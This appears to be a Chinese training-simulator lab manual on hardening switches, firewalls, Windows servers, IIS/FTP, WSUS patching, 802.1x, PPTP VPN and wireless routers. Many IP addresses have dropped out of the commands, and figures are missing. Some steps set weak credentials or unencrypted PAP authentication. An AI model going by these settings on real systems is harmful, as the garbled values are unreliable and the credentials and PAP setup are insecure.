第三十步：選擇流量分析圖列表中選擇今日流入流量分析圖，單擊“顯示”按鈕，如下圖所示。第三十一步：單擊“安全退出”，顯示下圖所示。單擊“確定”按鈕，退出界面。3項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護3.1任務1、完成交換機安全維護工作第一步：點擊“項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護”目錄下的“任務1、完成交換機安全維護工作”目錄，點擊后界面如下圖所示：

第二步：從設備庫中拖入交換機，PC機到場景中，然后在設備庫中選擇交換機電源線，連接交換機電源接口與插座，交換機電源指示燈亮；在設備庫中取出console線，連接PC機的COM口與交換機的console口，完成后，如下圖所示。第三步：單擊PC機顯示器，視角定位到顯示器，雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。

第四步：在“連接描述”窗口的名稱中輸入“交換機”，單擊“確定”按鈕，顯示如下圖所示“連接到”窗口。第五步：這里要求選擇“COM1”，點擊確定按鈕，進入界面如下圖所示：

第六步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊確定按鈕，如下圖所示：第七步：按下“Enter”鍵顯示下圖所示界面。

第八步：輸入n，按回車，顯示下圖所示界面。

第九步：依次輸入下列指令：enable（按回車鍵）config（按回車鍵）interfacevlan1（按回車鍵）ipaddress00（按回車鍵）noshutdown（按回車鍵）exit（按回車鍵）telnet-usertestpassword7test（按回車鍵）exit（按回車鍵）輸入后如下圖所示：

第十步：設置Telnet客戶端的安全IP地址，繼續(xù)輸入如下指令：config（按回車鍵）telnet-serversecurityip1（按回車鍵）輸入后如下圖所示：第十一步：測試Telnet，PC機已經(jīng)設置好IP地址“1”，從設備庫中取出直通雙絞線連接交換機的以太網(wǎng)口與PC機的以太網(wǎng)口，如下圖所示。第十二步：雙擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，如下圖所示。第十三步：在光標處輸入telnet00，顯示下圖。

第十四步：login后輸入之前設置的用戶名“test”，按回車后顯示“password：”，在后面輸入之前設置的密碼“test”。成功后顯示如下圖所示界面。第十五步：關(guān)閉Telnet，接著第十步的“switch(Config)#”后繼續(xù)輸入“notelnet-serverenable”命令，關(guān)閉Telnet功能，如下圖所示：

第十六步：測試telnet連接，雙擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，在光標處輸入telnet00，顯示如下圖所示界面。第十七步：接著第十五步繼續(xù)輸入一系列命令，“interfaceethernet0/0/24”，“arp-guardip”，“exit”，實現(xiàn)動態(tài)ARP檢測。如下圖所示：

第十八步：從設備庫中取出服務器，并取出直通雙絞線，連接服務器和交換機，PC機默認連到交換機的第一個以太網(wǎng)口，完成后，如下圖所示：第十九步：未做設置情況下，在PC機上打開瀏覽器圖標，地址欄輸入，顯示“你好，歡迎訪問！”。如下圖所示。

第二十步：配置ACL，使PC機不能訪問服務器的網(wǎng)站。右擊交換機，輸入下列指令:EnableConfigterminalAccess-list100denytcphost-sourcehost-destinationd-port80Access-list100permitipany-sourceany-destinationInterfaceEthernet0/0/1Ipaccess-group100inexit如下圖所示進行配置。

第二十一步：在PC機上打開瀏覽器圖標，地址欄輸入，顯示“目前無法訪問該服務器！”。3.2任務2、完成防火墻的安全維護第一步：點擊“項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護”目錄下的“任務2、完成防火墻的安全維護”目錄，點擊后界面如下圖所示：

第二步：從設備庫中拖入防火墻，PC機到場景中，然后在設備庫中選擇防火墻電源線，連接防火墻電源接口與插座，防火墻電源指示燈亮；在設備庫中取出console線，連接PC機的COM口與交換機的console口，打開防火墻背板上的開關(guān)按鈕，PWR燈亮，STA燈閃。完成后，如下圖所示。第三步：從設備庫中取出交叉雙絞線連接防火墻的e0/0以太網(wǎng)口和PC機的以太網(wǎng)口，如下圖所示。此時防火墻相應的以太網(wǎng)口LNK燈亮起，表明網(wǎng)絡的物理連接已經(jīng)建立。觀察指示燈（ACT燈）狀態(tài)為閃爍，表明有數(shù)據(jù)在嘗試傳輸。如果用直通線連接防火墻與PC機，防火墻冒煙、面板上的燈不亮，并提示“請選擇正確的線纜，不然防火墻設備會被燒壞！”。

第四步：連接完成后，點擊PC機顯示器，視角定位PC機桌面。桌面上有“我的文檔、我的電腦、IE瀏覽器、回收站、超級終端”等圖標，任務欄中的網(wǎng)絡連接情況為。單擊圖標，打開PC機的連接狀態(tài)窗口，如下圖所示?？梢园l(fā)現(xiàn)只有數(shù)據(jù)發(fā)送，沒有接收到的數(shù)據(jù)，這是因為防火墻的端口默認狀態(tài)下都會禁止向未經(jīng)驗證和配置的設備發(fā)送數(shù)據(jù)，保證數(shù)據(jù)的安全。

第五步：在上圖中單擊“屬性”按鈕，打開本地連接屬性對話框。然后選擇“Internet協(xié)議（TCP/IP）”并單擊“屬性”按鈕或雙擊“Internet協(xié)議（TCP/IP）”，如下圖所示：第六步：在上圖中選擇“使用下面的IP地址”，并做IP地址、子網(wǎng)掩碼、默認網(wǎng)關(guān)的設置，設置好后如下圖所示。第七步：連續(xù)單擊“確定”按鈕，PC機任務欄顯示下圖所示提示。單擊本地連接的“”按鈕，關(guān)閉該對話框。第八步：雙擊桌面上的IE瀏覽器，在地址欄中輸入防火墻的默認管理地址，顯示如下圖所示界面。第九步：用戶名和密碼中分別輸入admin，語言下拉列表中選擇中文，單擊登錄顯示如下圖所示界面；第十步：單擊左側(cè)“系統(tǒng)”菜單或其下“主機名稱”子欄目，顯示如下圖所示。

第十一步：單擊“密碼策略”顯示下圖所示界面。第十二步：設置密碼策略，如下圖所做設置，單擊“確定”保存設置。

第十三步：單擊“管理員”，顯示下圖所示界面。第十四步：添加系統(tǒng)管理員用戶，單擊“新建”按鈕，填寫相關(guān)數(shù)據(jù)，如下圖所示。其中“權(quán)限”包括“讀-執(zhí)行”和“讀-執(zhí)行-寫”。

第十五步：單擊“確定”，檢查密碼策略（密碼必須包括至少兩個大寫字母，兩個小寫字母，兩個數(shù)字和兩個其它字符(如@$*)，最小長度6位），若不符合該策略，需要重新設置密碼，如下圖所示。重新設置密碼為：AAaa11@@,然后點擊確定按鈕，成功添加，如下圖所示：

第十六步：修改admin密碼，單擊admin后面的圖標，打開下圖所示界面。單擊“確定”，檢查密碼策略（密碼必須包括至少兩個大寫字母，兩個小寫字母，兩個數(shù)字和兩個其它字符(如@$*)，最小長度6位），若不符合該策略，顯示圖19所示密碼策略提示。若符合策略，單擊“確定”，第十七步：刪除test用戶，單擊test后面的圖標，刪除后顯示下圖所示。

第十八步：單擊左側(cè)“可信主機”，顯示下圖所示。單擊“新建”，顯示下圖所示。

第十九步：做相關(guān)填寫與設置后顯示下圖所示。第二十步：刪除網(wǎng)絡地址，單擊后面的圖標，刪除后顯示下圖所示。

第二十一步：單擊左側(cè)的“網(wǎng)絡”或其下子欄目“接口”，顯示下圖所示界面。第二十二步：設置ethernet0/1安全管理域類型，單擊ethernet0/1后面的圖標，顯示下圖所示。

第二十三步：選擇“第三層安全域”，顯示下圖所示。第二十四步：做相關(guān)配置后顯示下圖所示。

單擊“確定”，顯示下圖所示。第二十五步：啟用“ARP強制認證”，單擊左側(cè)“安全”顯示下圖所示。

第二十六步：單擊“IP-MAC”，然后單擊要啟用ARP強制認證接口的“啟用”復選框，若直接選擇“ARP強制認證(全選)”，下面所用的“啟用”復選框均勾選上。如下圖所示。第二十七步：單擊左側(cè)“URL過濾”，顯示下圖所示。

第二十八步：單擊“黑名單”、“白名單”前面的圖標，顯示下圖所示。第二十九步：在URL文本框中輸入地址后，單擊添加，如下圖所示。第三十步：設置ethernet0/0安全管理域類型，在第二十一步中單擊ethernet0/0后面的圖標，選擇“無綁定安全域”，顯示下圖所示。第三十一步：回到第九步所示界面，如下圖所示：

第三十二步：點擊“升級”按鈕，打開下圖所示界面。第三十三步：單擊“瀏覽”按鈕，打開下圖所示窗口。

第三十四步：選擇“DCFOS-2.0R5.p5”，單擊“打開”按鈕，顯示下圖所示界面。第三十五步：單擊“確定”按鈕，在“選擇下次啟動時使用的系統(tǒng)固件(系統(tǒng)需要重啟以生效)”后面的列表框中選擇“DCFOS-2.0R5.p5”，設定下次啟動時使用的系統(tǒng)固件，如下圖所示。完成配置，關(guān)閉瀏覽器。

3.3任務3、完成服務器系統(tǒng)級的基本安全維護第一步：點擊“項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護”目錄下的“任務3、完成服務器系統(tǒng)級的基本安全維護”目錄，點擊后界面如下圖所示：第二步：在設備庫中取出服務器，如下圖所示：

第三步：點擊服務器顯示器，視角定位服務器桌面。如下圖所示。第四步：單擊“開始”按鈕，彈出菜單，然后選擇“管理工具”選項，彈出如下圖所示菜單。第五步：打開“計算機管理”對話框中，單擊左側(cè)“本地用戶和組”前面的加號，展開“本地用戶和組”，顯示其下兩個子選項“用戶”和“組”如下圖所示。第六步：單擊“用戶”選項，如下圖所示。

第七步：在右邊空白處右擊時，彈出快捷菜單，如下圖所示。第八步：選擇“新用戶”，打開如下圖所示的“新用戶”對話框。第九步：在“新用戶”對話框中的“用戶名”中輸入usera，“密碼”和“密碼確認”中輸入usera。“創(chuàng)建”按鈕由灰色變成黑色，單擊“創(chuàng)建”按鈕后，用戶名、密碼、密碼確認清空，用戶列表中增加usera賬戶。如下圖所示。

第十步：雙擊usera，彈出“usera屬性”對話框，。單擊“隸屬于”選項卡，顯示如下圖所示界面。

第十一步：單擊“添加”按鈕，彈出的“選擇組”對話框，單擊“高級”按鈕，“選擇組”對話框變成下圖所示結(jié)構(gòu)。

第十二步：單擊“立即查找”按鈕，在“搜索結(jié)果”列表框中列出系統(tǒng)中的用戶組。在列表中選擇“Administrators”，單擊“確定”按鈕，“選擇組”對話框回到簡單結(jié)構(gòu)模式，并在“輸入對象名稱來選擇”文本框中顯示“ZJGZ-CED45FBF16\Administrators”，如下圖所示。

第十三步：單擊“確定”按鈕，“選擇組”對話框關(guān)閉，“usera屬性”對話框的“隸屬于”列表中增加“Administrators”，如下圖所示。

第十四步：右擊管理員賬戶usera，彈出快捷菜單，如圖14所示。選擇“重命名”命令，“usera”賬號變?yōu)樗{色可編輯狀態(tài)，如下圖所示。第十五步：鍵入一個新名稱userb，按回車鍵后重命名成功，顯示下圖所示界面。第十六步：右擊管理員賬戶userb，彈出快捷菜單。選擇“設置密碼”命令，顯示“為userb設置密碼”提示信息，如圖17所示。單擊“繼續(xù)”按鈕，顯示“為userb設置密碼”對話框，如下圖所示。

第十七步：在“新密碼”和“密碼確認”中輸入userb，單擊“確定”按鈕，顯示“密碼已設置”提示框，單擊“確定”按鈕，“為userb設置密碼”對話框關(guān)閉，顯示下圖所示界面。

第十八步：雙擊userb，打開如圖22所示的“userb屬性”對話框。選中“賬戶已禁用”，前面的復選框呈選中狀態(tài)，如下圖所示。

第十九步：單擊“確定”按鈕，“userb屬性”對話框關(guān)閉。userb賬戶圖標上出現(xiàn)一個差號，如下圖所示。

第二十步：單擊左側(cè)的“組”選項。雙擊Administrators，打開如下圖所示的“Administrators屬性”對話框。選擇“userb”，“刪除”按鈕有灰色變成黑色，單擊刪除”按鈕“userb”消失。單擊“確定”按鈕，“Administrators屬性”對話框關(guān)閉。

第二十一步：關(guān)閉計算機管理界面，然后右擊“我的電腦”圖標，選擇“資源管理器”，如下圖所示。

第二十二步：通過單擊C盤或D盤找到想要設置權(quán)限的文件夾，右擊該文件夾，在彈出的快捷菜單中選擇“屬性”命令，如下圖所示。

第二十三步：開“屬性”對話框，選擇“安全”選項卡，在“組或用戶名”列表框中，選擇“CREATOROWNER”用戶，在“CREATOROWNER的權(quán)限”列表框中，可以查看其當前屬性，如下圖所示。

第二十四步：單擊“高級”按鈕，繼續(xù)在“權(quán)限項目”列表框中選擇CREATOROWNER，單擊“編輯”按鈕，即看到CREATOROWNER的權(quán)限，如下圖所示。

第二十五步：單擊第二十三步圖中的“添加”按鈕，打開“選擇用戶或組”對話框，在“輸入對象名稱來選擇”文本框中，輸入想要添加的用戶賬戶名，這里輸入usera,單擊“確定”按鈕即可，如下圖所示。選擇想要刪除的用戶或組，并單擊“刪除”按鈕，即可將其從列表中刪除。單擊“應用”和“確定”按鈕，保存設置即可。其中單擊“確定”按鈕關(guān)閉對話框。

第二十六步：單擊“審核”選項卡，如下圖所示第二十七步：單擊“添加”按鈕，打開“選擇用戶或組”對話框，輸入用戶名，這里輸入usera,單擊“確定”，如下圖所示：第二十八步：“成功”和“失敗”下的復選框可以選擇，其中，選擇最上面的“完全控制”，下面的對應的一列復選框全被選中，如下圖所示。

第二十九步：單擊“確定”按鈕，顯示如下圖所示。第三十步：關(guān)閉界面，然后依次選擇“開始”→“管理工具”→“Internet信息服務（IIS）管理器”選項，如下圖所示。

第三十一步：選擇“身份認證”，如下圖所示。

第三十二步：在“身份驗證”窗口中，選擇“匿名身份驗證”，單擊“操作”欄中的“編輯”鏈接，顯示“編輯匿名身份驗證憑據(jù)”對話框，如下圖所示。

第三十三步：單擊“設置”按鈕，顯示“設置憑據(jù)”對話框，輸入相關(guān)內(nèi)容，如下圖所示。單擊“確定”按鈕，替換系統(tǒng)默認的IUSR賬戶。

第三十四步：選擇“匿名身份驗證”選項，單擊“操作”欄中的“禁用”鏈接，即可禁用匿名訪問。雙擊選擇“基本身份驗證”，顯示“編輯基本身份驗證設置”對話框，如下圖所示。在“默認域”、“領(lǐng)域”文本框中輸入默認情況下對用戶進行身份驗證時所依據(jù)的域名、DNS域名或地址。單擊“確定”按鈕，保存設置即可。

第三十五步：在“Internet信息服務（IIS）管理器”的“DefaultWebSite主頁”窗口中，雙擊“Ipv4地址和域限制”圖標，顯示“Ipv4地址和域限制”窗口，如下圖所示。第三十六步：單擊“添加允許條目”鏈接，打開“添加允許限制規(guī)則”對話框，如下圖所示。第三十七步：在“特定Ipv4地址”單選按鈕對應文本框中，輸入想要允許訪問的單個IP地址即可。在“Ipv4地址范圍”單選按鈕對應的文本框中，并輸入相應的主機IP地址和“掩碼”，可以同時添加多個被允許訪問的主機IP地址，如下圖所示。

第三十八步：單擊“確定”按鈕，新創(chuàng)建的限制規(guī)則即可被添加到“Ipv4地址和域限制”列表中，如下圖所示“添加拒絕條目”的操作步驟與之類似。

第三十九步：在“操作”欄中單擊“編輯功能設置”鏈接，顯示“編輯IP和域限制設置”對話框。下拉列表框中包含“允許”和“拒絕”。選中“啟用域名限制”復選框，提示通過域名限制訪問會要求DNS反向查找每一個連接，可能會嚴重影響服務器的性能。因此，用戶應慎重使用。如下圖所示。

第四十步：在“Internet信息服務（IIS）管理器”窗口中，右擊“DefaultWebSite”，并選擇快捷菜單中的“編輯綁定”選項，顯示如圖所示的“網(wǎng)站綁定”對話框如下圖所示。

第四十一步：選擇需要設置端口安全的站點名稱，單擊“編輯”按鈕，顯示如下圖所示的“編輯網(wǎng)站綁定”對話框，默認使用的端口是80，重新輸入新的端口號即可。第四十二步：單擊“確定”按鈕，如下圖所示。

第四十三步：選擇“屬性”，打開FTP站點屬性對話框，如下圖所示。第四十四步：切換至“安全賬戶”選項卡，顯示如下圖所示。

第四十五步：取消“允許匿名連接”復選框，彈出下圖所示界面，單擊“是”確認，并繼續(xù)單擊“確定”，保存設置。第四十六步：“目錄安全性”選項卡，如下圖所示。第四十七步：選擇“拒絕訪問”單選按鈕，表示默認情況下所有計算機均被拒絕訪問，只有被添加的IP地址用戶可以訪問。相反，也可以設置為默認情況下所有計算機都將被“允許訪問”，然后創(chuàng)建需要拒絕訪問的IP地址列表。單擊“添加”按鈕，顯示如下圖所示的“授權(quán)訪問”對話框。

第四十八步：默認選擇“一臺計算機”單選按鈕，每次只能添加一個IP地址。選擇“一組計算機”單選按鈕，在“網(wǎng)絡標識”和“子網(wǎng)掩碼”文本框中，輸入相應的網(wǎng)絡標示信息，添加一個網(wǎng)段內(nèi)的所有IP地址，如下圖所示。

第四十九步：單擊“確定”按鈕，將該所選的IP地址或IP地址添加至“下列除外”列表中，如下圖所示。單擊“確定”，保存設置即可。

3.4任務4、完成服務器的漏洞查找及補丁升級第一步：點擊“項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護”目錄下的“任務4、完成服務器的漏洞查找及補丁升級”目錄，點擊后界面如下圖所示。第二步：在設備庫中取出服務器，如下圖所示。

第三步：點擊服務器顯示器，視角定位服務器桌面，安裝IIS，單擊“開始”按鈕，如下圖所示。第四步：選擇“服務器管理器”，打開如下圖所示界面。

第五步：單擊左側(cè)“角色”，如下圖所示。第六步：單擊“添加角色”，如下圖所示。第七步：單擊左側(cè)“服務器角色”，如下圖所示。第八步：單擊“Web服務器(IIS)”,“下一步”按鈕變成黑色。如下圖所示。

第九步：單擊左側(cè)“角色服務”，如下圖所示。第十步：單擊“應用程序開發(fā)”，其對應下的所有復選框均勾選上，如下圖所示。

第十一步：單擊“下一步”按鈕，開始安裝。進度省略，顯示安裝成功界面。如下圖所示。單擊關(guān)閉按鈕，返回主界面。

第十二步：單擊左側(cè)“功能”，顯示如下圖所示。第十三步：單擊“添加功能”，打開如下圖所示界面。

第十四步：勾選“BITS服務器擴展”，“下一步”按鈕變成黑色，單擊“下一步”按鈕，開始安裝，安裝成功顯示如下圖所示界面。單擊“關(guān)閉”按鈕，返回桌面。第十五步：點擊“WSUS30-KB972455-x86”安裝文件圖標，顯示下圖所示。第十六步：單擊“下一步”按鈕，下列安裝設置過程省略，所有圖中選擇默認項，直到安裝成功完成，安裝完成界面如下圖所示。第十七步：單擊“完成”，關(guān)閉安裝對話框，進入配置向?qū)υ捒?，如下圖所示。第十八步：依次單擊“下一步”按鈕，如下列圖所示。

第十九步：單擊“開始連接”按鈕，顯示如下圖所示。

第二十步：單擊“下一步”按鈕，顯示如下圖所示。

第二十一步：單擊“下一步”按鈕，顯示如下列圖片所示。

第二十二步：單擊“所有分類”，其下所有復選框均為選中，單擊“下一步”按鈕，如下圖所示。

第二十三步：設置為“自動同步”，如下圖所示。

第二十四步：依次單擊“下一步”，顯示如下列圖所示。單擊“完成”按鈕，關(guān)閉配置對話框，返回桌面。

第二十五步：單擊“開始”，選擇“運行”，文本框中輸入gpedit.msc，如下圖所示。第二十六步：單擊確定按鈕，打開如下圖所示界面。

第二十七步：單擊左側(cè)的“計算機配置”下的“管理模板”前面的加號，如下圖所示。第二十八步：單擊其下的“Windows組件”前面的加號，如下圖所示。

第二十九步：單擊其下的“WindowsUpdate”，如下圖所示。第三十步：雙擊“配置自動更新”，打開如下圖所示界面。

第三十一步：選擇“已啟用”，如下圖所示。第三十二步：單擊“下一設置”按鈕，選擇“已啟用”，在兩個文本框中輸入WSUS服務器的地址，單擊確定保存并關(guān)閉對話框，返回桌面。輸入格式為http://IP地址，如39。如下圖所示。點擊確定按鈕，關(guān)閉界面，返回桌面。第三十三步：單擊“開始”按鈕，選擇“管理工具”下的“WindowsServerUpdateServices”，如下圖所示。第三十四步：單擊“WindowsServerUpdateServices”打開如下圖所示界面。第三十五步：單擊左側(cè)“同步”，顯示圖47所示。第三十六步：右擊“同步”，如下圖所示。

第三十七步：選擇“立即同步”，如下圖所示。第三十八步：單擊“未分配的計算機”，顯示如下圖所示界面。

第三十九步：右擊計算機名，單擊“刪除”即可實現(xiàn)刪除操作，如下圖所示。第四十步：右擊左側(cè)“所有計算機”，如下圖所示。

第四十一步：選擇“添加計算機組”，打開如下圖所示界面。第四十二步：文本框中輸入名稱，“添加”按鈕變成黑色，單擊“添加”顯示如下圖所示界面。

第四十三步：單擊左側(cè)“所有更新”，如下圖所示。第四十四步：右擊“MicrosoftWindows安裝程序3.1”，如下圖所示。

第四十五步：選擇“審批”，如下圖所示。第四十六步：右擊“test”，如下圖所示。

第四十七步：選擇“已審批進行安裝”，如下圖所示。第四十八步：右擊“test”，如下圖所示。

第四十九步：選擇“自定義”，如下圖所示。第五十步：輸入完成后，單擊“確定”按鈕，顯示如下圖所示。

第五十一步：單擊“關(guān)閉”按鈕，返回主界面，如下圖所示：第五十二步：右擊更新，選擇“導入更新”，如下列圖所示。

第五十三步：輸入“servercore”，單擊“搜索”按鈕，如下圖所示。

第五十四步：單擊“全部添加”按鈕，如下圖所示。第五十五步：單擊“查看選擇籃”，如下圖所示。單擊“刪除”可直接刪除。

第五十六步：單擊“導入”，完成后如下圖所示。

4項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務4.1任務1、完成所有接入交換機802.1x接入認證設置第一步：點擊“項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務”目錄下的“任務1、完成所有接入交換機802.1x接入認證設置”目錄，點擊后界面如下圖所示：

第二步：從設備庫中取出交換機、PC機、服務器，從庫中取出直通雙絞線、console線、交換機電源線。分別用電源線連接交換機的電源插孔和插座；用console線連接PC機COM口與交換機的console口；用直通雙絞線連接PC機以太網(wǎng)口與交換機的0/0/2口；用直通雙絞線連接服務器與交換機的0/0/2之外的口。完成后，如下圖所示：第三步：點擊PC機顯示器，視角定位到顯示器，雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。

第四步：在“連接描述”窗口的名稱中輸入“交換機”，單擊“登錄”按鈕，（如果沒輸入，直接點擊“確定”顯示提示框“請輸入正確的連接名稱！”，點擊“取消”按鈕則關(guān)閉窗口，回到桌面），界面如下圖所示：第五步：點擊“登錄”按鈕，界面如下圖所示：

第六步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：第七步：按下“Enter”鍵顯示下圖所示界面。

第八步：輸入n，按回車，顯示下圖所示界面。第九步：在上圖的“switch>”后面輸入相應的命令，按回車換行繼續(xù)輸入命令，最終結(jié)果顯示如下圖所示界面。

第十步：上圖中配置完成過后，PC桌面右下角網(wǎng)絡連接狀態(tài)為連接成功圖標，如下圖所示。第十一步：測試連接狀態(tài)，關(guān)閉超級終端界面然后點擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，如下圖所示。

第十二步：在光標處輸入ping，顯示如下圖所示界面。

4.2任務2、完成VPN接入服務的配置第一步：點擊“項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務”目錄下的“任務2、完成VPN接入服務的配置”目錄，點擊后界面如下圖所示：第二步：從設備庫中取出路由器、PC機、服務器，從庫中取出直通雙絞線、console線、路由器電源線。分別用電源線連接路由器的電源插孔和插座；用console線連接PC機COM口與路由器的console口；用直通雙絞線連接PC機以太網(wǎng)口與路由器的以太網(wǎng)口；用直通雙絞線連接服務器與路由器的另外一個以太網(wǎng)口。完成后，如下圖所示。

第三步：點擊PC機顯示器，視角定位到顯示器。雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。第四步：在“連接描述”窗口的名稱中輸入“路由器”，單擊“登錄”按鈕，（如果沒輸入，直接點擊“確定”顯示提示框“請輸入正確的連接名稱！”，點擊“取消”按鈕則關(guān)閉窗口，回到桌面），界面如下圖所示：

第五步：點擊“確定”按鈕，界面如下圖所示：第六步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：

第七步：按下“Enter”鍵顯示下圖所示界面。第八步：在上圖的“router>”后面輸入相應的命令，按回車換行繼續(xù)輸入命令，最終結(jié)果顯示如下列圖片所示界面。

緊接上圖，如下圖所示：第九步：超級終端窗口，回到PC桌面，單擊“開始-附件-通訊-新建連接向?qū)А保缦聢D所示。

第十步：選擇“新建連接向?qū)А保蜷_如下圖圖所示界面。第十一步：單擊“下一步”，顯示如下圖所示界面。

第十二步：選擇“連接到我的工作場所的網(wǎng)絡”，單擊“下一步”，顯示如下圖所示界面。第十三步：選擇“虛擬專用網(wǎng)絡連接”，單擊“下一步”，如下圖所示。

第十四步：在公司名中輸入PPTP，單擊“下一步”按鈕，如下圖所示。第十五步：輸入路由器中配置的IP地址9，單擊“下一步”按鈕，顯示圖17所示。

第十六步：勾選復選框，單擊“完成”按鈕，關(guān)閉“新建連接向?qū)А睂υ捒颍烂嫔隙喑鱿旅娴囊粋€圖標。第十七步：雙擊該圖標，顯示如下圖所示界面。

第十八步：輸入路由器中配置的用戶名pptp、密碼pptp、并勾選復選框，設置好后顯示如下圖所示界面。第十九步：單擊“屬性”，顯示如下圖所示界面。第二十步：單擊“安全”選項卡，顯示如下圖所示界面。第二十一步：選擇“高級”單選按鈕，顯示如下圖所示界面。第二十二步：單擊“設置”按鈕，顯示如下圖所示界面。第二十三步：“數(shù)據(jù)加密”中選擇“可選加密”，“允許這些協(xié)議”中只選擇“不加密的密碼（PAP）”，如下列圖片所示。第二十四步：單擊“確定”，關(guān)閉該對話框，返回，選擇“網(wǎng)絡”選項卡，打開下圖所示界面。

第二十五步：在“VPN類型”中選擇PPTPVPN，如圖27、28所示。第二十六步：單擊“確定”按鈕，關(guān)閉該對話框，打開下圖所示界面。

第二十七步：單擊“連接”按鈕，顯示下圖所示界面。第二十八步：3秒后顯示下圖所示界面。第二十九步：3秒后顯示下圖所示界面。第三十步：3秒后顯示下圖所示界面。

4.3任務3、完成交換機端口安全的配置第一步：：點擊“項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務”目錄下的“任務3、完成交換機端口安全的配置”目錄，點擊后界面如下圖所示：第二步：從設備庫中取出交換機、PC機、服務器。分別用電源線連接交換機的電源插孔和插座；用console線連接PC機COM口與交換機的console口；用直通雙絞線連接PC機以太網(wǎng)口與交換機的以太網(wǎng)口，如0/0/1；用直通雙絞線連接服務器與交換機的其他以太網(wǎng)口，如0/0/24。完成后，如下圖所示：第三步：點擊PC機顯示器，視角定位到顯示器，雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。第四步：在“連接描述”窗口的名稱中輸入“交換機”，單擊“登錄”按鈕，（如果沒輸入，直接點擊“確定”顯示提示框“請輸入正確的連接名稱！”，點擊“取消”按鈕則關(guān)閉窗口，回到桌面），界面如下圖所示：

第五步：點擊“確定”按鈕，界面如下圖所示：第六步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：

第七步：按下“Enter”鍵顯示下圖所示界面。第八步：輸入n，按回車，顯示下圖所示界面。

第九步：靜態(tài)實現(xiàn)MAC地址與端口綁定，在上圖的“switch>”后面輸入相應的命令，按回車換行繼續(xù)輸入命令，最終結(jié)果顯示如下圖所示界面。上圖中光標停在“mac-address”后跳動，點擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，如下圖所示。

在光標處輸入ipconfig/all，顯示如下圖所示界面。在上圖查看到得“PhysicalAddress”，所以繼續(xù)在超級終端中的mac-address后面輸入，輸入完成后界面如下圖所示。

第十步：測試，繼續(xù)在上圖中輸入exit和show命令，查看配置情況，如下圖所示。第十一步：打開命令提示符，在光標處輸入ping，顯示如下圖所示。

第十二步：關(guān)閉PC桌面，回到設備連接界面，移除PC機，從設備庫中選擇再選擇一臺PC機，拖至桌子上，桌面與之前的PC機一致。將之前的console線和雙絞線連接至該PC機的COM口和以太網(wǎng)口。點擊PC機顯示器，視角定位至桌面，點擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，在光標處輸入ping，顯示如下圖所示界面。第十三步：輸入ipconfig/all，顯示如下圖所示界面。第十四步：雙擊桌面上的“超級終端”圖標，打開第十步所示界面，接著輸入，如下圖所示。第十五步：關(guān)閉PC桌面，回到設備連接界面，移除PC機，從設備庫中選擇再選擇一臺PC機，拖至桌子上，桌面與之前的PC機一致。將之前的console線和雙絞線連接至該PC機的COM口和以太網(wǎng)口。點擊PC機顯示器，視角定位至桌面，點擊PC機桌面上的命令提示符圖標，打開命令提示符窗口，在光標處輸入ping，顯示如下圖所示界面。第十六步：設置端口違背模式為shutdown，然后手動開啟，在第十四步中繼續(xù)輸入命令，如下圖所示。

4.4任務4、完成無線路由器的安全配置第一步：點擊“項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務”目錄下的“任務4、完成無線路由器的安全配置”目錄，點擊后界面如下圖所示：第二步：給無線路由器接上電源，用鼠標點一下無線路由器的電源插頭，然后再用鼠標點一下插座上的兩空插座，完成后，如下圖所示。

第三步：用鼠標點擊網(wǎng)線頭，然后點擊一下無線路由器四個網(wǎng)口中的一個，完成后，如下圖所示。第四步：鼠標移動到筆記本電腦上面，然后雙擊筆記本桌面。

第五步：彈出筆記本桌面，如下圖所示。第六步：雙擊瀏覽器圖標，在瀏覽器地址欄中輸入，然后點擊瀏覽器上的轉(zhuǎn)到圖標，如下圖所示。第七步：輸入用戶名：admin，密碼：admin，點擊確定按鈕，如下所示。第八步：單擊“安全設置”展開安全設置目錄，如下圖所示。

第九步：單擊“防火墻設置”，在窗口中同時選中“開啟防火墻”和“IP地址過濾”復選框，并在“缺省過濾規(guī)則”選項區(qū)域中選擇一種過濾規(guī)則，單擊“保存”按鈕，保存所做設置。如下圖所示。第十步：單擊左側(cè)“安全設置”→“IP地址過濾”，顯示“IP地址過濾”窗口，可以添加過濾規(guī)則。如下圖所示。

第十一步：單擊“添加新條目”按鈕，設置如下選項，如禁止的計算機在8：30到18：00之間發(fā)送郵件的設置，如下圖所示配置。第十二步：單擊“保存”按鈕保存設置，一條新規(guī)則添加完成。如下圖所示。

